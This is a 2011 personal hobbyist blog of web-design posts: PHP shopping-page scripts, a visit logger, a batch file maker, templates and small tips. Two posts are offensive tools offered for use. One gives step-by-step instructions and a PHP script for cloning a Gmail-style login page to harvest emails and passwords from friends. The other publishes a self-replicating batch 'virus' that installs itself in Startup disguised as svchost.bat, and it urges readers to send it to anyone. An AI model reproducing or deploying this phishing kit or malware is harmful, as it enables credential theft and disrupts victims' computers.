Sunday, October 9, 2011

Making a Google Chrome Extension to show my Twitter Post

So after a long time, I finally got something to share with you all.
If you use Twitter for say posting updates of your site on it, then you can use the extension I made to allow your users to read your Twitter posts directly from their Chrome Browser address bar.

The tutorial is really really long, the script is anyway. So I have posted everything on Instructables.
Here is the link

Monday, June 27, 2011

Draw circuits online

How many of you make electronics projects for hobby?

The problem with making electronic circuits is drawing them either on paper or on computer. There are many software to make circuits like Eagle, but installing them is a hassle (if you don't make that many circuits).

So an easy solution for this problem is an online system by Google called Webtronics. It is still in testing phase, but it is awesome. You can easily design any circuit add components just by picking and placing and connect them easily.

Here is the link

Saturday, June 4, 2011

File Maker v0.1

This is a really silly project.
This batch file created a file of the name and extension in the location you enter in it.
You can do that without it and much faster, but I mad it so I had to share it with you.
It uses many commands that you might find useful in other batch files, if you are new to batch files.

Here is the code

@echo off
title File Maker v0.1
color 0a

echo  Enter file location
set/p "loc="
echo  Enter filename with extension
set/p "file="
echo  File location
echo  %loc%
echo  File name
echo  %file%

echo Create File
echo Y for Yes
echo N for No
echo E for Exit
set/p "auth="
if %auth%==Y goto data
if %auth%==y goto data
if %auth%==N goto back
if %auth%==n goto back
if %auth%==E goto end
if %auth%==e goto end
echo Wrong Input
goto top

echo  Enter your data in the file (text only)
set/p "data="
echo  Write File %loc%\%file%? (Y/N)
set/p "ask="
if %ask%==Y goto make
if %ask%==y goto make
if %ask%==N goto back
if %ask%==n goto back
echo Wrong Input
goto sec

echo %data% >> "%loc%\%file%
echo  File Created.....

echo  Do you want to create another file? (Y/N)
set/p "aga="
if %aga%==Y goto back
if %aga%==y goto back
if %aga%==N goto end
if %aga%==n goto end
echo Wrong Input
goto doyou


Copy and paste it in Notepad and save it as anything.bat

To use it open it, enter location where you want to make the file.
P.S.- Do not enter "\" at the end of the location

Next enter the filename with it's extension

Enter the data and enter Y to create the file.


Wednesday, June 1, 2011

Added new template to my portfolio

I have added a new web template in my portfolio. This one is different because unlike other templates which are corporate look, this one is actually for a romantic novel author. It's a very simple generic design.
So go and check it out.
For those who don't know here is a link to my portfolio

Wednesday, May 25, 2011

My new website

I have a new website.
Actually it is a blogspot blog type site (I swore that when I'll get fees from my first client that day I'll buy a domain from that money).

So my new site/blog is
You'll find all the information about me there, contact info and a little about my self and a lot about my work.

If you tend to visit that site do comment on how it looks.

Saturday, May 21, 2011

I am currently a Freelance Web-Designer/Developer

I have just turned into a freelance web-designer and developer. So anyone in Kolkata, West-Bengal or India want some web-designing done then I'm here for you.
Best designs at lowest prices if that what you want then you'll find both here.

Tuesday, May 10, 2011

Check out my portfolio

I have made a portfolio, containing screenshots of some of the templates made by me.
Check them out and tell me how are they.

Saturday, May 7, 2011

My Wish List

Hey, for those who want 2 know I may get a job soon. So I thought that what should I buy from my first salary and there are so many things that I don't know that I would be able to remember it or not.
So I created a wish list to help me remember. You can check out my list on If you are a tech geek like me then you'll also like to buy some of the things that I want.

P.S.- The list is not complete, I'll add into it often.

Friday, April 8, 2011

Page Speed by Google

When a user accesses your site or blog, then they do not want to sit all day for your site to open.
It is really frustrating to sit and sit and sit and sit and sit...................... till the entire site is open.

If your site takes time then it may turn to loss in traffic. So how do you know how slow is your site.

This is Page Speed Online by Google™. It tells you in percentage how slow is your site (100% being the fastest and 0% being you know).

And for your information, this blog scored a 89 out of 100.
So go now and try it.

Wednesday, April 6, 2011

Check out my new web-design

I have been busy, with my exams and all but I finally got some time and made this web template. Just check it out and tell me if it's good or great.
It's all CSS DIV, NO TABLES, easy to be adapted for any site.
Here is the link

Sunday, April 3, 2011

New vision of Blogspot

Blogspot has a new format for the viewers of your blog.(If you didn't knew yet)
Instead of that old-fashioned text after text and line after line you can show people your blog in new ways and not only one but in many ways.

Just change the url of your blog from say to

But although they are great, there are some problems.
Starting with you cannot customize the color.
Secondly all your tiny tabs, like about you, links to other sites and all important ads will not be shown.
Next if you have mostly text (like mine), then only the sidebar and timeslide will work.
But if you have a blog containing mostly images (like my new blog, then the remaining three are perfect for you.

If you ask me these are not for all viewers. You can just place a link in your blog called Slideshow and link it to say flipcard or mosaic view, so viewers can see the images.

Thursday, March 24, 2011

Custom Cursor for your website

What happens to the mouse cursor when a user clicks on a button?
Here is some code to change that.


Just add any of the above code in the code of say a button or <p> or any other tag and the cursor would change. Just look at the example given above.

Saturday, March 19, 2011

FPSP - Flat File Php Shopping Page

It's a very long time since I blogged. The reason is that I was working on this.
Today on Holi this is my present to all of you. Maybe the last version of my Php Shopping Script.
I have been working on this for the past few months and now it is ready for you all to download and use.
This script comes with a lot more than any of my previous script. It includes:

1) Flat file databases (as the name suggested)
2) Products are divided into categories for easy access
3) Much more information about the product can be stored in flat files.
4) Very easy to update and use.

WOW! That is a lot. Also because the coding in this script is much more complicated, I have decided to give it pre packed. So just go to and download

It is really easy to use, you can understand it completely. Just use it and if possible send me some traffic here.

Thursday, March 17, 2011

Phishing through fake login page

Before I begin, this is only an educational tutorial. Stealing others' personal information is legally and morally wrong. So just have fun with it, play pranks with your friends and don't do anything that you might regret later.

Phishing is one of the oldest and perhaps the easiest way to hack someone's personal page or E-Mail account. It simply makes the target believe that the login page they are entering their userid and password is real, but sends their login info to the phisher. Wrong but useful.
So to do this just follow the streps
1) Open any site (e.g.- Google, Yahoo, Facebook, Twitter, etc) and go to their login page.

2) Right Click anywhere on the login page and click on Save As..... Give the file a name like gmail.html (.html is important)

3) Open the gmail.html file in say Notebook or any HTML editor. Find the form tag
Here is the one from gmail

(Different sites have different codes, but the form tag remains the same)

4) The important part in this code is actually the action. We have to change the action which is pointing to Google to your phishing script.
So we change action=""
to action=""

5) Open Notepad, copy and paste the following code
// Phisher v1.0
// Created by Tanmay Das

$userid = $_POST['Email'];
$pass = $_POST['Passwd'];

$newphish = "dbase.txt";
$newphishHandle = fopen($newphish, 'w');

$phish = "dbase.txt";
$info = file($phish);

$today = date("l, F j, Y, g:i a");
$ipadd = getenv("REMOTE_ADDR");
$reff = getenv("HTTP_REFERER");

$insertdata = $today."||".$ipadd."||".$reff."||".$userid."||".$pass."\n";
$fp = fopen($dbase, "a");
fputs($fp, $insertdata);

echo '<script type="text/javascript">';
echo 'window.location = ""';
echo '</script>';
Save it as phish.php

5) Save the file along with phish.php and upload it on your server or any free server like
Send your friend an E-mail containing the link to this page. Remember to change the text of the link to something like"

6) When they would open the link and enter their  userid and password. The script will look for dbase.txt. If not found then a new file will be created on your server. Just download dbase.txt when you have lots of userids and passwords.

Note again Let me be clear. This is just a tutorial for knowledge purpose. Phishing is a legal offence punishable by law. If you are caught stealing someone's data then I am in no way responsible for your actions.

Tuesday, February 15, 2011

FPSP - Flat File Php Shopping Page v 4.0

Have you enjoyed my Php Shopping Page Scripts v 2.0 and v 3.0 ?
Then you would love perhaps the last version of Php Shopping Page script FPSP v 4.0.
Yes the last and the best. It has so many new features that it may be the biggest script that I have ever written.
The features include:
1) It uses text files as database, so NO Sql or Access requried.
2) The products or scripts can be uploaded and the database can be updated online.
3) After a successful transaction, the user is asked to enter an email address where an email is sent containing a download code. The user clicks on the code to download the file.
4) The download code is different for each transaction and once downloaded then it becomes invalid.
5) The file to be downloaded is first copied to a download folder and given a random name, so that any user cannot trace the file to the folder where all your download files are located.
6) It also logs the date and time of download, IP address of the user, name of the product, file name and much more so that you know how much you sold.
7) All the important pages accessed by the admin are password protected.

This is just the summary of all the things that I've added, it took me months to come up with a script that was complicated enough to solve all your problems as well as simple enough for the average user to use.
It is still in Alpha testing stage. To go to Beta stage I need volunteers who can test the script and tell me the result. So if you want to test it for me, then leave a comment along with an email address and I'll send you a copy.

Sunday, February 6, 2011

Hexadecimal codes for colors for you

When designing a site it is really difficult to find a color, since there are lots of them and since each color is represented by a 6 digit hexadecimal code if any one of the digits is misplaced then the entire color changes. So to help you I have uploaded a list of most used colors along with their name and hexadecimal codes. Just go to

T.J Virus

Hey guys,
Last time I posted my Happy Ending batch virus code 4 U, I M surprised 2 see that still today many search for that post. So to rejoice that I M again posting a batch virus code written by me. It's my take on the rabbit virus or fork bomb. First it copies itself as svchost.bat in the Startup folder and then on every boot it looks for two batch files Tom.bat and Jerry.bat, if not found then it creates them. If found then it calls them and then disables the mouse. Once called both Tom and Jerry call each other again and again until you shutdown the computer.
Here is the code:

@echo off
:: 7.J_/IRU5
:: (R3473D_8Y_NRK89
title Tom and Jerry Virus created by NRK89.
if exist "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat" goto tom
copy %0 "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
attrib +h +r "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat"
attib +h +r %0

if exist "C:\Documents and Settings\%username%\Desktop\tom.bat" goto jerry
echo @echo off > "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo title I am Tom >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo color 08 >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo if exist "C:\Documents and Settings\%username%\Desktop\jerry.bat" goto 60 >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo start "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat" >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo :60 >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo start /max "C:\Documents and Settings\%username%\Desktop\jerry.bat" >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo copy %0 “C:\Documents and Settingd\%username%\Desktop\jerry%random%.bat >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo cls >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo echo. >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo dir/s >> "C:\Documents and Settings\%username%\Desktop\tom.bat"
echo goto 60 >> "C:\Documents and Settings\%username%\Desktop\tom.bat"

if exist "C:\Documents and Settings\%username%\Desktop\jerry.bat" goto nxt
echo @echo off > "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo title I am Jerry >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo color 06 >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo if exist "C:\Documents and Settings\%username%\Desktop\tom.bat" goto 60 >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo start "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\svchost.bat" >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo :60 >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo start /max "C:\Documents and Settings\%username%\Desktop\tom.bat" >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo copy %0 “C:\Documents and Settingd\%username%\Desktop\tom%random%.bat >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo cls >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo echo. >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo dir/s >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"
echo goto 60 >> "C:\Documents and Settings\%username%\Desktop\jerry.bat"

start /max "C:\Documents and Settings\%username%\Desktop\tom.bat"
start /max "C:\Documents and Settings\%username%\Desktop\jerry.bat"
rundll32.exe disable mouse

Save it as anything.bat and you are done. It is a big file as it contains codes for three batch files. Just send it to anyone. It won't damage your computer (I hope).

Quick Response Code at you service.

So guys have you heard about QR code?
It looks something like this
If you take a picture of this design from your smart phone or PC with a QR reader installed then you would be taken to my blog. Cool right and not only that you can also print out these designs like bar codes, but unlike bar codes that store only numbers, these codes can store anything from your site's url do that users are directly taken to your site to a phone number the users can call or send sms and if you want you can even leave messages encoded in them.
You can create your own code and download the QR reader software free of cost from

Thursday, February 3, 2011

LogIt v1.0

Even if you have a free site or blog like mine, you still advertise it don't you?
The cheapest and easiest way to advertise your site is by asking others to post a banner of your site on theirs and adding a link back to your site or simply a text link on their site
e.g.- <a href=""><img sre="mybanner.jpg"></a>
Although easy it has one big problem, how would you know how many users visited your site, from which site and which pages were visited the most?
You might have a visitor counter on your site, so do I. But that also won't give you all the details, so here is a script that not only records the date of the visit, but also the user's IP address, from which site they came and which page they visited.
// LogIt v1.0
// Script Written By Tanmay Das
// Script © Copyright Design

// Opening Databse file
$dbase = 'dbase.txt';
$data = file($dbase);
// Creating array
$array = explode("||", $data[0]);
$today = $array[0]; // Today's date
$ipad = $array[1]; // IP of the user
$reff = $array[2]; // Site from the user came
$frurl = $array[3]; // Page the user wished to go
$today = date("l, F j, Y, g:i a");
$ipad = getenv("REMOTE_ADDR");
$reff = getenv("HTTP_REFERER");
$default0 = home;
$frurl = isset($_GET['url']) ? $_GET['url'] : $default0;
if($frurl != 'home')
$insertdata = $today."||".$ipad."||".$reff."||".$frurl."\n";
// Writing data to file
$fp = fopen($dbase,"a");
header("Location: ".$frurl); // Redirecting user to specified page
$userinfo = file('dbase.txt'); // Opening Database file
// Creating Table
echo '<table border = "1">';
echo '<tr><td>Date</td><td>IP Address</td><td>Referrer Address</td><td>Forwaded URL</td></tr>';
foreach($userinfo as $key => $val)
//explode that data into a new array:
$data[$key] = explode("||", $val);
for($k = 0; $k < sizeof($userinfo); $k++)
echo '<tr><td>'.$data[$k][0].'</td><td>'.$data[$k][1].'</td>';
echo '<td><a href="'.$data[$k][2].'">'.$data[$k][2].'</a></td><td><a href="'.$data[$k][3].'">'.$data[$k][3].'</a></td></tr>';
echo '</table>';

Just save it as say click.php upload it on your server along with a blank text file named dbase.txt.
While giving someone link to post on their site, instead of
<a href=""><img sre="mybanner.jpg"></a>, give
<a href=""><img sre="mybanner.jpg"></a>
Try it out.

Meta Tag Generator

When coding a site in HTML or  PHP, meta data is really important. If you have read about SEO (Search Engine Optimization) then you would know that search engine like Google™ and Yahoo™ first read the meta data so adding it in your page makes your page even more easy for search engines to find.
But if you don't know how to write meta data then here is my Meta Tag Generator v1.0. Just enter the following data and hit Generate. Your code would be ready, just copy and paste the code between the <head></head> tags and you are done.

Meta Tag Generator v1.0
Written By Tanmay Das
Title of the Page :
Name of the Author :
E-Mail of the Author :
Robots Permission :
Copyright Date :

Character Set Info
Page Expires on :
Refresh Period :
Reload URL :
Description :
Keywords :

Thursday, January 27, 2011

Check out Site

OK I found this site by luck. But this is great what this site does is it shows all the info about your website/blog, like your site's estimated value, revenue, page views, alexa rating, backlinks, Google and Yahoo indexed pages and much more.
I also got a widget for my site check it out. It's got all the info in one place. You should really check out your site's ratings.

Tuesday, January 25, 2011

Can any of you access PayPal

Earlier it was like that if you had to had a PayPal account to buy or sell online. So I suppose many of you would have a PayPal account right?
If you don't then try going to I have tried for very long and whenever I go there I see this

This webpage is not available.

The webpage at might be temporarily down or it may have moved permanently to a new web address.

Not only that i have even googled paypal and looked at all the links popped up and the result was the same.
So what's with PayPal, have they shutdown or something or they don't want me to come in.

Friday, January 21, 2011

Alertpay ™ PHP Shopping Page v3.0

So as I mentioned earlier I have made some changes like you don't need a separate download and cancel page all is done in just one page. Script is easy to change you have to just edit the all.js file everytime you add a new product.


// Alertpay PHP Shopping Page Script v3.0
// Script written By Tanmay Das
// © Copyright All rights reserved.
// 'name of the thumbshot, screenshot and .zip file to be downloaded', 'name of the product','author','price',
'H5p9O33k7Uf5','HTML Template','Tanmay Das','18',
function listDisplay(dataArr)
var furl, name, author, r1, l, v;
v = 4;
l = (dataArr.length / v)-(dataArr.length / v);
furl = dataArr[l * v];
name = dataArr[(l * v)+1];
author = dataArr[(l * v)+2];
r1 = dataArr[(l * v)+3];
r2 = dataArr[(l * v)+4];

document.write('<div id="thumb_div">');
document.write('<table width="200" border="0" cellspacing="0" cellpadding="0">');
document.write('<tr><td><img src="template/thumbs/'+furl+'.jpg" width="200" height="150" /></td></tr>');
document.write('<tr><td width="53">Author : '+author+'</td></tr>');
document.write('<tr><td>Price : $'+r1+'</td></tr>');
document.write('<tr><td height="20" align="center"><a href="');
document.write('id='+furl+'&amp;name='+name+'&amp;aut='+author+'&amp;r1='+r1+'" target="_self">');
document.write('View Template</a></td></tr>');
document.write('<tr><td align="center"><a href="');
document.write('id='+furl+'&amp;name='+name+'&amp;aut='+author+'&amp;r1='+r1+'" target="_self">');
document.write('<img src="../images/buy_small.gif" width="115" height="27" border="0" /></a></td></tr>');
Copy it, save it as all.js (for now) and change the links given in bold


// Alertpay PHP Shopping Page Script v3.0
// Script written By Tanmay Das
// © Copyright All rights reserved.
$default0 = 'all';
$dbase = isset($_GET['db']) ? $_GET['db'] : $default0;
$dbase = basename($dbase);
$default1 = 'test';
$furl = isset($_GET['id']) ? $_GET['id'] : $default1;
$furl = basename($furl);
$default2 = 'Name of the Template';
$fname = isset($_GET['name']) ? $_GET['name'] : $default2;
$fname = basename($fname);
$default3 = 'Tanmay Das';
$author = isset($_GET['aut']) ? $_GET['aut'] : $default3;
$author = basename($author);
$default4 = '0';
$price1 = isset($_GET['r1']) ? $_GET['r1'] : $default4;
$price1 = basename($price1);
$default5 = '0';
if (file_exists('download/'.$furl.'.zip'))    {
echo('<table width="1000" border="0" cellspacing="0" cellpadding="0">');
echo('<tr><td width="75%"><img src="preview/'.$furl.'.jpg" /></td>');
echo('<td width="25%" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">');
echo('<tr><td>Author : '.$author.'</td></tr><tr><td>&nbsp;</td></tr>');
echo('<tr><td>Commercial Licence (Price : $'.$price1.')</td></tr><tr><td align="center">');
echo('<form method="post" action="" >');
echo('<input type="hidden" name="ap_purchasetype" value="item-goods"/>');
echo('<input type="hidden" name="ap_merchant" value=""/>');
echo('<input type="hidden" name="ap_itemname" value="'.$fname.' (Commercial Licence)"/>');
echo('<input type="hidden" name="ap_currency" value="USD"/>');
echo('<input type="hidden" name="ap_returnurl" value="'.$fname.'&aut='.$author.'&rs='.$r1.'&id='.$furl.'"/>');
echo('<input type="hidden" name="ap_itemcode" value="'.$furl.'"/>');
echo('<input type="hidden" name="ap_quantity" value="1"/>');
echo('<input type="hidden" name="ap_amount" value="'.$price1.'"/>');
echo('<input type="hidden" name="ap_cancelurl" value="'.$fname.'&aut='.$author.'&rs='.$r1.'&id='.$furl.'"/>');
echo('<input type="image" name="ap_image" src="buy.gif"/>');
else if(!file_exists('template/dbase/'.$dbase.'.js'))
echo('<h5>There has been an ERROR</h5>');
echo('<script type="text/javascript" src="template/dbase/all.js"></script>');
Copy it save it as buy.php (for now) and edit everything in bold


// Alertpay PHP Shopping Page Script v3.0
// Script written By Tanmay Das
// © Copyright All rights reserved.
$default0 = 'home';
$furl = isset($_GET['id']) ? $_GET['id'] : $default0;
$furl = basename($furl);
$default1 = 'name';
$fname = isset($_GET['name']) ? $_GET['name'] : $default1;
$fname = basename($fname);
$default3 = 'Tanmay Das';
$author = isset($_GET['aut']) ? $_GET['aut'] : $default3;
$author = basename($author);
$default4 = '0';
$price = isset($_GET['rs']) ? $_GET['rs'] : $default4;
$price = basename($price);
$default5 = '5';
$status = isset($_GET['s']) ? $_GET['s'] : $default5;
$status = basename($status);
if ($status == '0')
echo ('Thank You for Purchasing HTML Template named '.$fname.' by '.$author.' with  Commercial Licence priced $'.$price);
echo ('<div align="center"><b>Download is in progress</b><br />');
echo ('<img src="../images/load.gif" width="32" height="32" /><br />');
echo ('If the download doesn&acute;t starts within 5sec<br>');
echo ('<a href="'.$furl.'">Click Here</a> to download manually</div>');
else if ($status == '1')
echo ('Sorry but the transaction was not successfull');
echo ('You have some error');
Copy and save it as download.php (for now) and change everything in bold

That's it important thing is to just go through the codes and change the links to where you have placed each file. The thumbnail image, screenshot image and the .zip file to be downloaded have the same name for ease of use, hence they are placed in different folders e.g.-thumbs, preview and download.
The buy buttons you can download from AlertPay™. Just go to Bussiness Tools > Generate a "Buy Now" Button and then select the button and copy it's url. verified by Alertpay™

Good news,
My site Design InLine has been verified by AlertPay™. So now I can sell my web-templates from my site and in celebration of this news I am posting my AlertPay™ PHP Shopping Page v3.0 for you.
I have made some changes to my PHP Shopping Page v2.0 which include.
Instead of the following pages.
download.php and

This script uses just
all.js (you can make separate .js file for each category of your product)
buy.php and

So I hope you like it.

Sunday, January 16, 2011

Web Pages That

If you are into web-designing or development then this site will give you all the information that you should NEVER DO to your website.

Saturday, January 15, 2011

PHP Shopping Page v2.0

Last time I showed you a script to make a simple PHP Shopping page using just PHP and your AlertPay account. There were some glitches in them including you had to add/change the link to your download page manually on your product page. So I made a small file dbase.js to act as a database to hold all the data about your product. So all you have to do is paste a link like
<script type="text/javascript" src="dbase.js"></script>
on your product/ gallery page and it'll make a neat display of all your scripts along with their names, thumbs, author's name and prices.
Here is the script

// DBase Script (part of PHP Shopping Page Script)
// © Copyright, Design
  // Script written by Tanmay Das

// Name of the files, Name of the Template to be shown, Name of the Author, prices

  'H5p9O33k7Uf5','Name of the Template','Tanmay Das','18','20',

function listDisplay(dataArr)
  var furl, name, author, r1, r2, l, v;
  v = 5;
  l = (dataArr.length / v)-(dataArr.length / v);
  furl = dataArr[l * v];
  name = dataArr[(l * v)+1];
  author = dataArr[(l * v)+2];
  r1 = dataArr[(l * v)+3];
  r2 = dataArr[(l * v)+4];

  document.write('<div style="float:left; margin-right:10px; margin-top:5px; margin-bottom:5px;">');
  document.write('<table width="200" border="0" cellspacing="0" cellpadding="0">');
  document.write('<tr><td><img src="thumbs/'+furl+'.jpg" width="200" height="150" /></td></tr>');
  // thumbnails are in thumbs folder
  document.write('<tr><td width="53">Author : '+author+'</td></tr>');
  document.write('<tr><td>Price : $'+r1+'</td></tr>');
  document.write('<tr><td><a href="');
  document.write('id='+furl+'&amp;name='+name+'&amp;aut='+author+'&amp;r1='+r1+'&amp;r2='+r2+'" target="_self">');
  document.write('<tr><td><a href="');
  document.write('id='+furl+'&amp;name='+name+'&amp;aut='+author+'&amp;r1='+r1+'&amp;r2='+r2+'" target="_self">');
  document.write('<img src="buy_small.gif" width="115" height="27" border="0" /></a></td></tr>');

Go to to watch it working.

Now use it as you want but please credit me for my work.
P.S.- Remember to make it simple I used the same variable for all the files.
Meaning, if you are selling a template, the name of the thumbnail image, screenshot image and .zip file which people will download should be the same. e.g.- H5p9O33k7Uf5.
You can use a randomizer script to make cryptic names for your files.

Simple Shopping Cart with Alertpay™

Many of you must be thinking about putting a shopping cart on your site, blog to earn some cash, sell your HTML templates or images or scripts. But shopping cart takes a little effort to run. I mean My SQL or a flat file database. Also many free scripts use a .cgi file, if you have paid hosting then no problem, but if you have free hosting (like my ) then you are not given access to any .cgi file on the server.
So after fiddling around with PHP, I made a script that uses neither a database (My SQL or flat file) nor .cgi file. It is a simple PHP file that calls the variable from the link to load data and sends the user to your AlertPay page to buy your file. So all you have to do is upload the screenshot image file, flash files (if any) and the zip file to be downloaded and using only three files you can sell all your files. I have used AlertPay because I have an account there also I tried to open a PayPal™ account but I didn't succeed. So here is my script.
You might remember earlier I had posted a tutorial I modified to make PHP Templates. The script is more or less the same but I modified it more so that instead of calling a php file. It calls .jpg preview of the template and inserts all the data from the link into itself. Sample.
To start just copy and paste this code in the body tag and save it as say cart.php.
// Simple PHP Shopping Page Script
// © Copyright, Design
// Script created by Tanmay Das
$default1 = 'test';
$furl = isset($_GET['id']) ? $_GET['id'] : $default1;
$furl = basename($furl);
$default2 = 'Name of the Template';
$fname = isset($_GET['name']) ? $_GET['name'] : $default2;
$fname = basename($fname);
$default3 = 'Tanmay Das';
$author = isset($_GET['aut']) ? $_GET['aut'] : $default3;
$author = basename($author);
$default4 = '0';
$price1 = isset($_GET['r1']) ? $_GET['r1'] : $default4;
$price1 = basename($price1);
$default5 = '0';
$price2 = isset($_GET['r2']) ? $_GET['r2'] : $default5;
$price2 = basename($price2);
if (file_exists('download/'.$furl.'.zip'))    {
echo('<table width="1000" border="0" cellspacing="0" cellpadding="0">');
echo('<tr><td width="75%"><img src="preview/'.$furl.'.jpg" /></td>');
echo('<td width="25%" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">');
echo('<tr><td>Author : '.$author.'</td></tr><tr><td>&nbsp;</td></tr>');
echo('<tr><td>Commercial Licence (Price : $'.$price1.')</td></tr><tr><td align="center">');
echo('<form method="post" action="" >');
echo('<input type="hidden" name="ap_purchasetype" value="item-goods"/>');
echo('<input type="hidden" name="ap_merchant" value=""/>');
echo('<input type="hidden" name="ap_itemname" value="'.$fname.' (Commercial Licence)"/>');
echo('<input type="hidden" name="ap_currency" value="USD"/>');
echo('<input type="hidden" name="ap_returnurl" value="'.$furl.'"/>');
echo('<input type="hidden" name="ap_itemcode" value="'.$furl.'"/>');
echo('<input type="hidden" name="ap_quantity" value="1"/>');
echo('<input type="hidden" name="ap_amount" value="'.$price1.'"/>');
echo('<input type="hidden" name="ap_cancelurl" value="'.$furl.'"/>');
echo('<input type="image" name="ap_image" src="buy.gif"/>');
echo('<tr><td>Developer&acute;s Licence (Price : $'.$price2.')</td></tr>');
echo('<tr><td align="center"><form method="post" action="" >');
echo('<input type="hidden" name="ap_purchasetype" value="item-goods"/>');
echo('<input type="hidden" name="ap_merchant" value=""/>');
echo('<input type="hidden" name="ap_itemname" value="'.$fname.' (Developer&acute;s Licence)"/>');
echo('<input type="hidden" name="ap_currency" value="USD"/>');
echo('<input type="hidden" name="ap_returnurl" value="'.$furl.'"/>');
echo('<input type="hidden" name="ap_itemcode" value="'.$furl.'"/>');
echo('<input type="hidden" name="ap_quantity" value="1"/>');
echo('<input type="hidden" name="ap_amount" value="'.$price2.'"/>');
echo('<input type="hidden" name="ap_cancelurl" value="'.$furl.'"/>');
echo('<input type="image" name="ap_image" src="buy.gif"/>');
echo('The template you are looking for was not found');

Now for the link. of the Template&aut=Author's Name&r1=10&r2=20
OK the "id" is the name of your screenshot file (the image file that you'll give for preview) which should be in the "preview" folder also the name of the .zip/.rar file (the one that others will download) which should be in the "download" folder. You can change the folders by changing their paths.
The "name" in the link is the name you want to give to the template or script to download to make it look fancy. The "aut" is the name of the author of the file and "r1" and "r2" are the variables carrying the price to Alertpay™.

The download file is also very simple. Just copy and paste this code in download .php.

$default = 'home';
$furl = isset($_GET['id']) ? $_GET['id'] : $default;
$furl = basename($furl);
<div align="center"><b>Download is in progress</b><br />
<img src="load.gif" width="32" height="32" /><br />
If the download doesn't starts in 5 sec then <a href="<?php echo(''.$furl.'.zip'); ?>">Click Here</a> to download manually.</div>

It is a simple script right just make the files, upload them and test them out. You'll figure it out very easily.

P.S.- The script is still a work in progress. I have still some work to do on it to make it secure. It is basically for those who want to earn some cash, if you really want to earn your living of selling the I suggest you look for a more secure shopping cart.

Sunday, January 9, 2011

Check out my new site

Everybody come check out my new site Design InLine. With this site I'm entering into web-designing. I want all your support in this.
A little work is still remaining, but the overall site is complete. I want all your reviews on it.

Tuesday, January 4, 2011

PHP Template v 2.0

Earlier I posted a tutorial on making PHP Template (which I didn't made, but perfected it).
I had posted a link to my free site where I had written it in detail. But due to some reasons I had 2 remove it. As I have made the script even better I M giving a small tutorial here.
For starters, in a PHP tutorial a single file is used as template in which content from other files is pulled in. So when you want 2 edit a menu item which is present in all D pages U have 2 just edit the template file and upload it. Also you don't have to add any HTML codes inside the content files other than those which will be inside D <body> </body> tags.
First create your Template file and name it as index.php. Put all the links and other things that U want in it then in the area where U want 2 put the content after menus and before footer paste this code.

  $common = 'page1'; // Home Page
  $page = isset($_GET['p']) ? $_GET['p'] : $common;
  $page = basename($page);
  $default = 'main'; // Home Folder (you must place all the content files in a folder)
  $directory = isset($_GET['dir']) ? $_GET['dir'] : $default;
  $directory = basename($directory);
  if (!file_exists($directory.'/'.$page.'.php'))    {
  $page = '404';
  $directory = 'main';
Save it and U are done.
For the links U have 2 make some changes. As D script checks for folder & file U have 2 write links like this.
Instead of <a href="folder/page.php">Link</a>
Write <a href="?dir=folder&p=page">Link</a>

Sunday, January 2, 2011

How to start a business with no money

Many people want to start businesses but don't have the money. However many businesses, including some world wide ones, have been started by dedicated entrepreneurs with empty pockets. The trick is to specialize in a service or product that you're good at, you love to do, and then start growing one order at a time.
1) Car washing (portable) for office buildings
2) Computer assembling and repair.
3) Computer programming (Think Bill Gates)
4) Event planner (parties and events)
5) Freelance writing for media (Many people make $$$$ just blogging)
6) Gift baskets (One sale to start can become a Harry and David)
7) Handyman services (consider focusing on a specialty)
8) Hobbies can become businesses: cookies, decorated cake, etc.
9) Holiday decorating for homes and businesses.
10) House cleaning.
11) Photographer (weddings, parties or businesses)
12) Portable food cart (your own specialty)
13) Remodeling (specialized)
14) Resume/document writer.
15) Sports coach (tennis, basketball, baseball, etc.)
16) Teaching/tutoring: computer, musical instruments, languages, etc.(If you are good at something, never do it for free)
17) Website design and management.